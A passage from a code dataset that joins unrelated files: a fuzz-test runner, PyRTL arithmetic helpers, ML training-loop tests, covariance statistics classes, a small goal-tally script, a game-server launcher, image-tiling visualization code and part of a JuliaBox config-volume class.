test_list_selection = list(set(test_list_all).intersection(set(args.target)))
if not test_list_selection:
logging.error("No fuzz targets selected")
if args.exclude:
for excluded_target in args.exclude.split(","):
if excluded_target not in test_list_selection:
logging.error("Target \"{}\" not found in current target list.".format(excluded_target))
continue
test_list_selection.remove(excluded_target)
test_list_selection.sort()
logging.info("{} of {} detected fuzz target(s) selected: {}".format(len(test_list_selection), len(test_list_all), " ".join(test_list_selection)))
try:
help_output = subprocess.run(
args=[
os.path.join(config["environment"]["BUILDDIR"], 'src', 'test', 'fuzz', test_list_selection[0]),
'-help=1',
],
timeout=10,
check=True,
stderr=subprocess.PIPE,
universal_newlines=True,
).stderr
if "libFuzzer" not in help_output:
logging.error("Must be built with libFuzzer")
sys.exit(1)
except subprocess.TimeoutExpired:
logging.error("subprocess timed out: Currently only libFuzzer is supported")
sys.exit(1)
run_once(
corpus=args.seed_dir,
test_list=test_list_selection,
build_dir=config["environment"]["BUILDDIR"],
export_coverage=args.export_coverage,
use_valgrind=args.valgrind,
)
def run_once(*, corpus, test_list, build_dir, export_coverage, use_valgrind):
for t in test_list:
corpus_path = os.path.join(corpus, t)
if t in FUZZERS_MISSING_CORPORA:
os.makedirs(corpus_path, exist_ok=True)
args = [
os.path.join(build_dir, 'src', 'test', 'fuzz', t),
'-runs=1',
corpus_path,
]
if use_valgrind:
args = ['valgrind', '--quiet', '--error-exitcode=1'] + args
logging.debug('Run {} with args {}'.format(t, args))
result = subprocess.run(args, stderr=subprocess.PIPE, universal_newlines=True)
output = result.stderr
logging.debug('Output: {}'.format(output))
try:
result.check_returncode()
except subprocess.CalledProcessError as e:
if e.stdout:
logging.info(e.stdout)
if e.stderr:
logging.info(e.stderr)
logging.info("Target \"{}\" failed with exit code {}: {}".format(t, e.returncode, " ".join(args)))
sys.exit(1)
if not export_coverage:
continue
for l in output.splitlines():
if 'INITED' in l:
with open(os.path.join(corpus, t + '_coverage'), 'w', encoding='utf-8') as cov_file:
cov_file.write(l)
break
def parse_test_list(makefile):
with open(makefile, encoding='utf-8') as makefile_test:
test_list_all = []
read_targets = False
for line in makefile_test.readlines():
line = line.strip().replace('test/fuzz/', '').replace(' \\', '')
if read_targets:
if not line:
break
test_list_all.append(line)
continue
if line == 'FUZZ_TARGETS =':
read_targets = True
return test_list_all
if __name__ == '__main__':
main()
|
the-stack_0_25899
|
import collections
from logging import warn
import operator
import math
import six
from functools import reduce
import pyrtl
def gray_code(n):
""" Get the binary-reflected gray code of n """
n = pyrtl.as_wires(n)
return n ^ n[1:]
def signed_sub(a, b):
""" Return a WireVector for result of signed subtraction.
:param a: a WireVector to serve as first input to subtraction
:param b: a WireVector to serve as second input to subtraction
Given a length n WireVector and length m WireVector the result of the
signed subtraction is length max(n,m)+1. The inputs are twos
complement sign extended to the same length before subtracting.
If an integer is passed to either a or b, it will be converted
automatically to a two's complemented constant.
"""
if isinstance(a, (int, six.string_types)):
a = pyrtl.Const(a, signed=True)
if isinstance(b, (int, six.string_types)):
b = pyrtl.Const(b, signed=True)
a, b = pyrtl.match_bitwidth(pyrtl.as_wires(a), pyrtl.as_wires(b), signed=True)
result_len = len(a) + 1
ext_a = a.sign_extended(result_len)
ext_b = b.sign_extended(result_len)
# add and truncate to the correct length
return (ext_a - ext_b)[0:result_len]
CheckedResult = collections.namedtuple('CheckedResult', ['result', 'overflow'])
def checked_sub(a, b, bitwidth):
res = signed_sub(a, b).truncate(bitwidth)
# TODO All of these use subtraction under the hood, so this is less 'efficient'
# then we really need, given that we're also doing subtraction in signed_sub.
# Probably better to just have one function that does it all.
cond1 = pyrtl.signed_ge(a, 0) & pyrtl.signed_lt(b, 0) & pyrtl.signed_lt(res, 0)
cond2 = pyrtl.signed_lt(a, 0) & pyrtl.signed_ge(b, 0) & pyrtl.signed_ge(res, 0)
return CheckedResult(res, cond1 | cond2)
def difference(x, y):
""" Returns max(x, y) - min(x, y) [taking signedness into account] """
# Doing this verbosely because I only want one call to signed_sub.
x_gt_y = pyrtl.signed_gt(x, y)
high = pyrtl.select(x_gt_y, x, y)
low = pyrtl.select(x_gt_y, y, x)
return signed_sub(high, low)
def negate(x):
""" Negate a number (a la twos complement), not invert """
# Use this to automatically get correct size out (~x + 1 doesn't get it automatically)
return signed_sub(0, x)
def count_ones(w):
""" Count the number of one bits in a wire """
return reduce(operator.add, w)
# Could also do this:
# return pyrtl.tree_reduce(operator.add, w)
def count_zeroes(w):
return len(w) - count_ones(w)
# Two versions of the same function:
# - count_zeroes_from_end_fold()
# - count_zeroes_from_end()
# Both are here just to see difference in programming complexity and generated netlist complexity
def count_zeroes_from_end_fold(x, start='msb'):
def f(accum, x):
found, count = accum
is_zero = x == 0
to_add = ~found & is_zero
count = count + to_add
return (found | ~is_zero, count)
xs = x[::-1] if start == 'msb' else x
return reduce(f, xs, (pyrtl.as_wires(False), 0))[1]
# NOTE: this is essentially a fold, so we could probably use the stdlib's
# functools.reduce function (see above)
def count_zeroes_from_end(x, start='msb'):
if start not in ('msb', 'lsb'):
raise pyrtl.PyrtlError('Invalid start parameter')
def _count(x, found):
end = x[-1] if start == 'msb' else x[0]
is_zero = end == 0
to_add = ~found & is_zero
if len(x) == 1:
return to_add
else:
rest = x[:-1] if start == 'msb' else x[1:]
rest_to_add = _count(rest, found | ~is_zero)
return to_add + rest_to_add
return _count(x, pyrtl.as_wires(False))
def bitwidth_for_index(w):
""" Returns the number of bits needed to index every bit of w.
:param w: the wire being indexed into
:return: the number of bits needed to index every bit of w
Examples::
0bx requires a 1 bit index wv (index bit 0 only)
0bxx requires a 1 bit index wv (index bit 0 and 1)
0bxxx requires a 2 bit index wv (index bits 0, 1, and 2)
0bxxxx requires a 2 bit index wv (index bits 0, 1, 2, and 3)
0bxxxxx requires a 3 bit index wv (index bits 0, 1, 2, 3, and 4)
0bxxxxxx requires a 3 bit index wv (index bits 0, 1, 2, 3, 4, and 5)
"""
return int(math.floor(math.log2(w.bitwidth - 1)) + 1)
def rtl_index(w, ix):
"""
Like doing `w[ix]`
"""
return pyrtl.shift_right_logical(w, ix)[0]
# Could also do this:
# return rtl_slice(w, ix, ix+1)
def rtl_slice(w, *args):
""" Slice into a WireVector using WireVectors as the start (optional), end, and
step (optional) values.
Signatures::
rtl_slice(w, stop)
rtl_slice(w, start, stop[, step])
:param w: the WireVector or int to index into.
:param start: the starting value of the counter, inclusive (default: 0);
this is treated as *signed*.
:param stop: the stopping value of the counter, exclusive (default: len(w));
this is treated as *signed*.
:param step: the step size of the counter (default: 1);
this is treated as *signed*.
:return: a slice of the original WireVector, i.e. a subsection of the
original wire, possibly with some skipped bits depending on the value of step.
The width of the slice totally depends on the argument values.
It's probably easiest to think of calling `rtl_slice(w, start, end, step)`
as being equivalent to `w[start:end:step]` or `w[slice(start, end, step)]`.
This function is used to overcome the (very reasonable) limitation that PyRTL imposes on
slicing a WireVector: that the slice indices meet the same constraints as normal Python
slices.
Needing to use wires as indices is typically a sign that the object you're
indexing into should be a memory, but this function is provided for experimentation
nonetheless. Note that this will create a large series of muxes.
Also note that it is an error for step to be 0; we currently don't report this error
(instead just returning a 0 wire), but this function might be changed to return an
error wire indicating such an occurence instead.
There are no requirements on the bitwidth of step.
Example::
rtl_slice(
pyrtl.Const(0b10110010),
pyrtl.Const(2), # start (inclusive)
pyrtl.Const(8), # end (exclusive)
pyrtl.Const(3) # step
) == 0b10
From...
end (exclusive) to...
| start (inclusive)
| |
v v
0b10110010
^ ^
| |
get every 3rd bit, and concatenate to, get 0b10
"""
w = pyrtl.as_wires(w)
start, stop, step = None, None, None
if len(args) == 1:
stop = args[0]
elif len(args) == 2:
start, stop = args
elif len(args) == 3:
start, stop, step = args
else:
raise pyrtl.PyrtlError(
"rtl_slice takes 1 argument (stop), 2 arguments (start, stop), "
"or 3 arguments (start, stop, step)."
)
if start is None:
start = 0
if stop is None:
stop = w.bitwidth
if step is None:
step = 1
if all(isinstance(x, int) for x in (start, stop, step)):
import warnings
warnings.warn(
"Integer values (or defaults) were provided as the start and end indices "
"and step to `rtl_slice()`. Consider using standard slicing notation instead: "
"`w[start:stop:step]`."
)
# Instead of just making them all wires via as_wires,
# we can be smarter and more efficient by using slice nets when possible.
if isinstance(start, int):
w = w[start:]
else:
assert isinstance(start, pyrtl.WireVector)
shift_amount = pyrtl.select(
pyrtl.signed_lt(start, 0),
pyrtl.signed_add(w.bitwidth, start),
start
)
w = pyrtl.shift_right_logical(w, shift_amount)
if isinstance(stop, int):
w = w[:stop]
else:
assert isinstance(stop, pyrtl.WireVector)
# Dev note: this is either wrong, or is correct and can be simplified...
# Make start_c a wire so we can ensure its signed properly (rather than
# allow it to be coerced unsigned in the arithmetic below); ensuring it's
# signed is done by passing in an explicit bitwidth to `as_wires()`.
start_c = pyrtl.as_wires(start, bitwidth=(
start.bitwidth if isinstance(start, pyrtl.WireVector) else stop.bitwidth)
)
count = pyrtl.select(
pyrtl.signed_lt(stop, 0),
pyrtl.signed_add(w.bitwidth, stop),
pyrtl.select(
pyrtl.signed_lt(start_c, 0),
stop,
stop - start_c,
)
)
mask = pyrtl.shift_left_logical(pyrtl.Const(1, w.bitwidth), count) - 1
w = w & mask
if isinstance(step, int):
w = w[::step] # ValueError if step is 0
else:
assert isinstance(step, pyrtl.WireVector)
wn = pyrtl.WireVector(w.bitwidth)
stepn = pyrtl.WireVector(step.bitwidth)
with pyrtl.conditional_assignment:
with pyrtl.signed_lt(step, 0):
stepn |= negate(step)
wn |= w[::-1]
with pyrtl.otherwise:
stepn |= step
wn |= w
stepn = stepn if 2**stepn.bitwidth >= wn.bitwidth else (
stepn.zero_extended(bitwidth_for_index(wn))
)
w = pyrtl.mux(
stepn,
pyrtl.Const(0), # A step of 0 is invalid; report that with error line later
*[wn[::s] for s in range(1, wn.bitwidth)],
default=wn[0].zero_extended(wn.bitwidth) # any step > w.bitwidth is just first bit
)
return w
|
the-stack_0_25900
|
# Copyright (c) Facebook, Inc. and its affiliates.
import unittest
from unittest.mock import patch
import torch
from mmf.common.registry import registry
from mmf.utils.general import get_batch_size
from tests.test_utils import SimpleModel
from tests.trainers.test_trainer_mocks import TrainerTrainingLoopMock
class TestTrainingLoop(unittest.TestCase):
def test_update_frequency_num_remaining_updates_greater_than_update_frequency(self):
trainer1 = self._train_with_condition(
num_train_data=20,
max_updates=None,
max_epochs=2,
update_frequency=3,
batch_size=6,
)
self.assertEqual(trainer1.num_updates, 4)
trainer2 = self._train_with_condition(
num_train_data=20,
max_updates=4,
max_epochs=None,
update_frequency=1,
batch_size=18,
)
self.assertEqual(trainer2.num_updates, 4)
self._compare_model_params(trainer1, trainer2)
def test_update_frequency_reporting(self):
def _on_update_end(report, meter, should_log):
# the losses here should be the sum of two losses in
# iteration 0 and iteration 1 (both constitute update 0).
# Here iter 1 loss: 0.2599, iter 2 loss: 4.2090
loss = report.losses["loss"].detach().cpu().item()
self.assertAlmostEqual(loss, 4.4688, 4)
self._train_with_condition(
num_train_data=100,
max_updates=1,
max_epochs=None,
update_frequency=2,
batch_size=2,
on_update_end_fn=_on_update_end,
)
def test_update_frequency_correct_final_iteration(self):
trainer = TrainerTrainingLoopMock(100, 2, None, update_frequency=2)
trainer.load_datasets()
trainer.training_loop()
self.assertEqual(trainer.max_updates, 2)
self.assertEqual(trainer.current_iteration, 4)
def test_update_frequency_same_model_params(self):
trainer1 = self._train_with_condition(
num_train_data=100,
max_updates=2,
max_epochs=None,
update_frequency=2,
batch_size=2,
)
trainer1.load_datasets()
trainer2 = self._train_with_condition(
num_train_data=100,
max_updates=2,
max_epochs=None,
update_frequency=1,
batch_size=4,
)
trainer2.load_datasets()
self._compare_model_params(trainer1, trainer2)
def _compare_model_params(self, trainer1, trainer2):
for param1, param2 in zip(
trainer1.model.parameters(), trainer2.model.parameters()
):
self.assertTrue(torch.allclose(param1, param2))
def _train_with_condition(
self,
num_train_data,
max_updates,
max_epochs,
update_frequency,
batch_size,
on_update_end_fn=None,
):
torch.random.manual_seed(2)
model = SimpleModel({"in_dim": 1})
model.build()
opt = torch.optim.SGD(model.parameters(), lr=0.01)
trainer = TrainerTrainingLoopMock(
num_train_data,
max_updates,
max_epochs,
optimizer=opt,
update_frequency=update_frequency,
batch_size=batch_size,
)
trainer.load_datasets()
if on_update_end_fn:
trainer.on_update_end = on_update_end_fn
model.to(trainer.device)
trainer.model = model
trainer.training_loop()
return trainer
def test_epoch_over_updates(self):
trainer = TrainerTrainingLoopMock(100, 2, 0.04)
trainer.load_datasets()
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 4)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 4, 1, 4)
def test_fractional_epoch(self):
trainer = TrainerTrainingLoopMock(100, None, 0.04)
trainer.load_datasets()
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 4)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 4, 1, 4)
def test_updates(self):
trainer = TrainerTrainingLoopMock(100, 2, None)
trainer.load_datasets()
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 2)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 2, 1, 2)
def test_batch_size_per_device(self):
# Need to patch the mmf.utils.general's world size not mmf.utils.distributed
# as the first one is what will be used
with patch("mmf.utils.general.get_world_size", return_value=2):
trainer = TrainerTrainingLoopMock(100, 2, None, batch_size=4)
registry.register("config", trainer.config)
batch_size = get_batch_size()
trainer.config.training.batch_size = batch_size
trainer.load_datasets()
# Train loader has batch size per device, for global batch size 4
# with world size 2, batch size per device should 4 // 2 = 2
self.assertEqual(trainer.train_loader.current_loader.batch_size, 2)
# This is per device, so should stay same
trainer = TrainerTrainingLoopMock(100, 2, None, batch_size_per_device=4)
registry.register("config", trainer.config)
batch_size = get_batch_size()
trainer.config.training.batch_size = batch_size
trainer.load_datasets()
self.assertEqual(trainer.train_loader.current_loader.batch_size, 4)
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 2)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 2, 1, 2)
def check_values(self, trainer, current_iteration, current_epoch, num_updates):
self.assertEqual(trainer.current_iteration, current_iteration)
self.assertEqual(trainer.current_epoch, current_epoch)
self.assertEqual(trainer.num_updates, num_updates)
|
the-stack_0_25902
|
# (C) Crown Copyright, Met Office. All rights reserved.
#
# This file is part of ocean_error_covs and is released under the BSD 3-Clause license.
# See LICENSE in the root of the repository for full licensing details.
######################################################################
import numpy as np
class CovPairArrays():
def __init__(self, dims):
self.x = np.zeros(dims)
self.y = np.zeros(dims)
self.x_sq = np.zeros(dims)
self.y_sq = np.zeros(dims)
self.xy = np.zeros(dims)
self.sep_dist = np.zeros(dims)
def append_cov_pair(self, upd):
self.x = np.append(self.x, upd.x)
self.y = np.append(self.y, upd.y)
self.x_sq = np.append(self.x_sq, upd.x_sq)
self.y_sq = np.append(self.y_sq, upd.y_sq)
self.xy = np.append(self.xy, upd.xy)
self.sep_dist = np.append(self.sep_dist, upd.sep_dist)
return self
class CovSumStats():
def __init__(self, dims):
self.sum_x = np.ma.zeros(dims)
self.sum_y = np.ma.zeros(dims)
self.sum_x_sq = np.ma.zeros(dims)
self.sum_y_sq = np.ma.zeros(dims)
self.sum_xy = np.ma.zeros(dims)
self.num_pairs_in_cov = np.ma.zeros(dims,dtype=np.int32)
def __add__(self, upd):
update = CovSumStats(self.sum_x.shape)
update.sum_x = self.sum_x + upd.sum_x
update.sum_y = self.sum_y + upd.sum_y
update.sum_x_sq = self.sum_x_sq + upd.sum_x_sq
update.sum_y_sq = self.sum_y_sq + upd.sum_y_sq
update.sum_xy = self.sum_xy + upd.sum_xy
update.num_pairs_in_cov = self.num_pairs_in_cov + upd.num_pairs_in_cov
return update
class GridSumStats():
def __init__(self, dims):
self.num_obs_in_grid = np.ma.zeros(dims, dtype=np.int32)
self.grid_sum = np.ma.zeros(dims)
self.grid_sum_obs_std = np.ma.zeros(dims)
self.grid_sum_sq = np.ma.zeros(dims)
def __add__(self, upd):
update = GridSumStats(self.grid_sum.shape)
update.num_obs_in_grid = self.num_obs_in_grid + upd.num_obs_in_grid
update.grid_sum_obs_std = self.grid_sum_obs_std + upd.grid_sum_obs_std
update.grid_sum = self.grid_sum + upd.grid_sum
update.grid_sum_sq = self.grid_sum_sq + upd.grid_sum_sq
return update
class FdbkVarArrays():
def __init__(self):
self.obs_vals = ()
self.obs_std = ()
self.mod_vals = ()
self.obs_qc = ()
self.lons = ()
self.lats = ()
def __getitem__(self, i):
update = FdbkVarArrays()
update.obs_vals = self.obs_vals[i]
update.obs_std = self.obs_std[i]
update.mod_vals = self.mod_vals[i]
update.obs_qc = self.obs_qc[i]
update.lons = self.lons[i]
update.lats = self.lats[i]
return update
|
the-stack_0_25903
|
jogador = {}
jogador['nome'] = str(input('Nome do jogador: ')).strip().capitalize()
np = int(input(f'Quantas partidas {jogador["nome"]} jogou? '))
gols = []
tot = 0
for c in range(0, np):
g = (int(input(f'Quantos gols na {c+1}º partida? ')))
gols.append(g)
tot += g
jogador['gols'] = gols
jogador['total'] = tot
print('-='*30)
print(jogador)
print('-='*30)
for k, v in jogador.items():
print(f'O campo {k} tem o valor {v}.')
print('-='*30)
print(f'O jogador {jogador["nome"]} jogou {np} partidas.')
p = 0
for x in jogador['gols']:
p += 1
print(f' => Na partida {p}, fez {x} gols.')
print(f'Foi um total de {jogador["total"]} gols.')
|
the-stack_0_25904
|
import __builtin__
__builtin__.process = 'ai'
# Temporary hack patch:
__builtin__.__dict__.update(__import__('pandac.PandaModules', fromlist=['*']).__dict__)
from direct.extensions_native import HTTPChannel_extensions
from direct.showbase import PythonUtil
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--base-channel', help='The base channel that the server may use.')
parser.add_argument('--max-channels', help='The number of channels the server may use.')
parser.add_argument('--stateserver', help="The control channel of this AI's designated State Server.")
parser.add_argument('--district-name', help="What this AI Server's district will be named.")
parser.add_argument('--astron-ip', help="The IP address of the Astron Message Director to connect to.")
parser.add_argument('--eventlogger-ip', help="The IP address of the Astron Event Logger to log to.")
parser.add_argument('config', nargs='*', default=['config/general.prc', 'config/release/dev.prc'], help="PRC file(s) to load.")
args = parser.parse_args()
for prc in args.config:
loadPrcFile(prc)
localconfig = ''
if args.base_channel: localconfig += 'air-base-channel %s\n' % args.base_channel
if args.max_channels: localconfig += 'air-channel-allocation %s\n' % args.max_channels
if args.stateserver: localconfig += 'air-stateserver %s\n' % args.stateserver
if args.district_name: localconfig += 'district-name %s\n' % args.district_name
if args.astron_ip: localconfig += 'air-connect %s\n' % args.astron_ip
if args.eventlogger_ip: localconfig += 'eventlog-host %s\n' % args.eventlogger_ip
loadPrcFileData('Command-line', localconfig)
from otp.ai.AIBaseGlobal import *
from toontown.ai.ToontownAIRepository import ToontownAIRepository
simbase.air = ToontownAIRepository(config.GetInt('air-base-channel', 401000000),
config.GetInt('air-stateserver', 4002),
config.GetString('district-name', 'Devhaven'))
host = config.GetString('air-connect', '127.0.0.1')
port = 7100
if ':' in host:
host, port = host.split(':', 1)
port = int(port)
simbase.air.connect(host, port)
try:
run()
except SystemExit:
raise
except Exception:
info = PythonUtil.describeException()
simbase.air.writeServerEvent('ai-exception', avId=simbase.air.getAvatarIdFromSender(), accId=simbase.air.getAccountIdFromSender(), exception=info)
with open(config.GetString('ai-crash-log-name', 'ai-crash.txt'), 'w+') as file:
file.write(info + "\n")
raise
|
the-stack_0_25905
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
def pred_visualization(fname, arrays, picks, img_shape, tile_spacing=(0, 0),
scale_rows_to_unit_interval=True,
output_pixel_vals=True):
"""Used for visualization of predictions
Args:
fname: filename for saving the image
arrays: list of arrays containing the frames, first array is assumed to be
ground truth (all of shape Nxnframesxframesize**2)
picks: list containing indices of cases that should be used
img_shape: shape of a frame
tile_spacing: spacing between the tiles
scale_rows_to_unit_interval: see tile_raster_images
output_pixel_vals: see tile_raster_images
"""
ncases = len(picks)
narrays = len(arrays)
if narrays > 1:
horizon = arrays[1].shape[1]
horizon_gt = arrays[0].shape[1]
n_presteps = horizon_gt - horizon
if n_presteps > 0:
visdata = np.ones(
(ncases, horizon_gt * narrays, np.prod(img_shape)))
visdata[:, :horizon_gt] = arrays[0][picks]
for i in range(1, narrays):
visdata[:, i * horizon_gt:(i + 1) * horizon_gt] = \
np.hstack((
(np.ones((ncases, n_presteps, np.prod(img_shape)))),
arrays[i][picks]))
else:
visdata = np.hstack([arrays[i][picks] for i in range(narrays)])
else:
horizon = arrays[0].shape[1]
horizon_gt = horizon
visdata = np.hstack([arrays[i][picks] for i in range(narrays)])
visdata = visdata.reshape(ncases * narrays * horizon_gt, -1)
im = tile_raster_images(visdata, img_shape, (ncases * narrays, horizon_gt),
tile_spacing,
scale_rows_to_unit_interval, output_pixel_vals)
for i in range(len(picks) * len(arrays)):
# insert white patches for n_presteps
for j in range(horizon_gt - horizon):
if i % len(arrays) != 0:
im[i * img_shape[0] + i * tile_spacing[0]:(i + 1) * img_shape[0] + i * tile_spacing[0],
j * img_shape[1] + j * tile_spacing[1]:(j + 1) * img_shape[1] + j * tile_spacing[1]] = 255
h, w = im.shape
fig = plt.figure(frameon=False)
# fig.set_size_inches(1,h/np.float(w))
fig.set_size_inches(w / 24., h / 24.)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
ax.imshow(im, aspect='normal', interpolation='nearest')
fig.savefig(fname, dpi=24)
return im
def scale_to_unit_interval(ndar, eps=1e-8):
""" Scales all values in the ndarray ndar to be between 0 and 1 """
ndar = ndar.copy()
ndar -= ndar.min()
ndar *= 1.0 / (ndar.max() + eps)
return ndar
def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),
scale_rows_to_unit_interval=True, output_pixel_vals=True):
"""
Transform an array with one flattened image per row, into an array in
which images are reshaped and layed out like tiles on a floor.
This function is useful for visualizing datasets whose rows are images,
and also columns of matrices for transforming those rows
(such as the first layer of a neural net).
:type X: a 2-D ndarray or a tuple of 4 channels, elements of which can
be 2-D ndarrays or None;
:param X: a 2-D array in which every row is a flattened image.
:type img_shape: tuple; (height, width)
:param img_shape: the original shape of each image
:type tile_shape: tuple; (rows, cols)
:param tile_shape: the number of images to tile (rows, cols)
:param output_pixel_vals: if output should be pixel values (i.e. int8
values) or floats
:param scale_rows_to_unit_interval: if the values need to be scaled before
being plotted to [0, 1] or not
:returns: array suitable for viewing as an image.
(See:`PIL.Image.fromarray`.)
:rtype: a 2-d array with same dtype as X.
"""
assert len(img_shape) == 2
assert len(tile_shape) == 2
assert len(tile_spacing) == 2
# The expression below can be re-written in a more C style as
# follows :
#
# out_shape = [0, 0]
# out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -
# tile_spacing[0]
# out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -
# tile_spacing[1]
out_shape = [(ishp + tsp) * tshp - tsp for ishp, tshp, tsp
in zip(img_shape, tile_shape, tile_spacing)]
if isinstance(X, tuple):
assert len(X) == 4
# Create an output numpy ndarray to store the image
if output_pixel_vals:
out_array = np.zeros(
(out_shape[0], out_shape[1], 4), dtype='uint8')
else:
out_array = np.zeros(
(out_shape[0], out_shape[1], 4), dtype=X.dtype)
# colors default to 0, alpha defaults to 1 (opaque)
if output_pixel_vals:
channel_defaults = [0, 0, 0, 255]
else:
channel_defaults = [0., 0., 0., 1.]
for i in xrange(4):
if X[i] is None:
# if channel is None, fill it with zeros of the correct
# dtype
dt = out_array.dtype
if output_pixel_vals:
dt = 'uint8'
out_array[:, :, i] = np.zeros(out_shape,
dtype=dt) + channel_defaults[i]
else:
# use a recurrent call to compute the channel and store it
# in the output
out_array[:, :, i] = tile_raster_images(
X[i], img_shape, tile_shape, tile_spacing,
scale_rows_to_unit_interval, output_pixel_vals)
return out_array
else:
# if we are dealing with only one channel
H, W = img_shape
Hs, Ws = tile_spacing
# generate a matrix to store the output
dt = X.dtype
if output_pixel_vals:
dt = 'uint8'
out_array = np.zeros(out_shape, dtype=dt)
for tile_row in xrange(tile_shape[0]):
for tile_col in xrange(tile_shape[1]):
if tile_row * tile_shape[1] + tile_col < X.shape[0]:
if scale_rows_to_unit_interval:
# if we should scale values to be between 0 and 1
# do this by calling the `scale_to_unit_interval`
# function
this_img = scale_to_unit_interval(
X[tile_row * tile_shape[1] +
tile_col].reshape(img_shape))
else:
this_img = X[tile_row * tile_shape[1] +
tile_col].reshape(img_shape)
# add the slice to the corresponding position in the
# output array
c = 1
if output_pixel_vals:
c = 255
out_array[
tile_row * (H + Hs):tile_row * (H + Hs) + H,
tile_col * (W + Ws):tile_col * (W + Ws) + W
] \
= this_img * c
return out_array
def dispims_white(invwhitening, M, height, width, border=0, bordercolor=0.0,
layout=None, **kwargs):
""" Display a whole stack (colunmwise) of vectorized matrices. Useful
eg. to display the weights of a neural network layer.
"""
numimages = M.shape[1]
M = np.dot(invwhitening, M)
if layout is None:
n0 = int(np.ceil(np.sqrt(numimages)))
n1 = int(np.ceil(np.sqrt(numimages)))
else:
n0, n1 = layout
im = bordercolor * np.ones(((height + border) * n0 + border,
(width + border) * n1 + border), dtype='<f8')
for i in range(n0):
for j in range(n1):
if i * n1 + j < M.shape[1]:
im[i * (height + border) + border:(i + 1) * (height + border) + border,
j * (width + border) + border:(j + 1) * (width + border) + border] =\
np.vstack((
np.hstack((
np.reshape(M[:, i * n1 + j],
(height, width)),
bordercolor * np.ones((height, border),
dtype=float))),
bordercolor * np.ones((border, width + border),
dtype=float)))
plt.imshow(im, cmap=matplotlib.cm.gray, interpolation='nearest', **kwargs)
def CreateMovie(filename, plotter, numberOfFrames, fps):
for i in range(numberOfFrames):
plotter(i)
fname = '_tmp%05d.png' % i
plt.savefig(fname)
plt.clf()
os.system("convert -delay 20 -loop 0 _tmp*.png " + filename + ".gif")
os.system("rm _tmp*.png")
def dispimsmovie_patchwise(filename, M, inv, patchsize, fps=5, *args,
**kwargs):
numframes = M.shape[0] / inv.shape[1]
n = M.shape[0] / numframes
def plotter(i):
M_ = M[i * n:n * (i + 1)]
M_ = np.dot(inv, M_)
image = tile_raster_images(
M_.T, img_shape=(patchsize, patchsize),
tile_shape=(10, 10), tile_spacing=(1, 1),
scale_rows_to_unit_interval=True, output_pixel_vals=True)
plt.imshow(image, cmap=matplotlib.cm.gray, interpolation='nearest')
plt.axis('off')
CreateMovie(filename, plotter, numframes, fps)
def dispimsmovie(filename, W, filters, nframes, fps=5):
patchsize = np.uint8(np.sqrt(W.shape[0]))
def plotter(i):
dispims_white(W, filters[i * W.shape[1]:(i + 1) * W.shape[1], :], patchsize,
patchsize, 1, bordercolor=filters.mean(),
vmin=filters.min(), vmax=filters.max() * 0.8)
plt.axis('off')
CreateMovie(filename, plotter, nframes, fps)
def visualizefacenet(fname, imgs, patches_left, patches_right,
true_label, predicted_label):
"""Builds a plot of facenet with attention per RNN step and
classification result
"""
nsamples = imgs.shape[0]
nsteps = patches_left.shape[1]
is_correct = true_label == predicted_label
w = nsteps + 2 + (nsteps % 2)
h = nsamples * 2
plt.clf()
plt.gray()
for i in range(nsamples):
plt.subplot(nsamples, w // 2, i * w // 2 + 1)
plt.imshow(imgs[i])
msg = ('Prediction: ' + predicted_label[i] + ' TrueLabel: ' +
true_label[i])
if is_correct[i]:
plt.title(msg, color='green')
else:
plt.title(msg, color='red')
plt.axis('off')
for j in range(nsteps):
plt.subplot(h, w, i * 2 * w + 2 + 1 + j)
plt.imshow(patches_left[i, j])
plt.axis('off')
plt.subplot(h, w, i * 2 * w + 2 + 1 + j + w)
plt.imshow(patches_right[i, j])
plt.axis('off')
plt.show()
plt.savefig(fname)
if __name__ == '__main__':
from scipy.misc import lena
imgs = lena()[None, ...].repeat(3, axis=0)
patches_left = lena()[None, None, :256].repeat(3, axis=0).repeat(5, axis=1)
patches_right = lena()[None, None, 256:].repeat(
3, axis=0).repeat(5, axis=1)
true_label = np.array(['angry', 'angry', 'sad'])
predicted_label = np.array(['sad'] * 3)
visualizefacenet('lena.pdf', imgs, patches_left, patches_right,
true_label, predicted_label)
# vim: set ts=4 sw=4 sts=4 expandtab:
|
the-stack_0_25906
|
import os
from juliabox.jbox_util import ensure_delete, make_sure_path_exists, unique_sessname, JBoxCfg
from juliabox.vol import JBoxVol
class JBoxDefaultConfigVol(JBoxVol):
provides = [JBoxVol.JBP_CONFIG]
FS_LOC = None
@staticmethod
def configure():
cfg_location = os.path.expanduser(JBoxCfg.get('cfg_location'))
make_sure_path_exists(cfg_location)
JBoxDefaultConfigVol.FS_LOC = cfg_location
@staticmethod
def _get_config_mounts_used(cid):
used = []
props = JBoxDefaultConfigVol.dckr().inspect_container(cid)
try:
for _cpath, hpath in JBoxVol.extract_mounts(props):
if hpath.startswith(JBoxDefaultConfigVol.FS_LOC):
used.append(hpath.split('/')[-1])
except:
JBoxDefaultConfigVol.log_error("error finding config mount points used in " + cid)
return []
return used
@staticmethod
def refresh_disk_use_status(container_id_list=None):
pass
@staticmethod
def get_disk_for_user(user_email):
JBoxDefaultConfigVol.log_debug("creating configs disk for %s", user_email)
if JBoxDefaultConfigVol.FS_LOC is None:
JBoxDefaultConfigVol.configure()
disk_path = os.path.join(JBoxDefaultConfigVol.FS_LOC, unique_sessname(user_email))
cfgvol = JBoxDefaultConfigVol(disk_path, user_email=user_email)
cfgvol._unpack_config()
return cfgvol
@staticmethod
def is_mount_path(fs_path):
return fs_path.startswith(JBoxDefaultConfigVol.FS_LOC)
@staticmethod
def get_disk_from_container(cid):
